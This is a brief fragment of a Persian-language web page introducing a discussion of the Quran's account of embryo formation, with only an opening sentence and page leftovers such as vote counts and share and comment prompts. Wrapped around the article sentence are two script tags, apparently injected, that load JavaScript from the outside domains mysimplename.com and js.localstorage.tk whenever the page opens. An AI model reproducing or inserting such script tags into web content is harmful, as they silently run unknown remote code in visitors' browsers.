بررسی ادعای قرآن در مورد شکل گیری جنین


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مطالبی که در صدد بیان آن هستیم تماما برگرفته از قرآن کریم هستند، کتابی که مستقیما کلام خداوند است و طی بیش از 1400 سال تغییر نیافته است...<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
7

- 
1

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)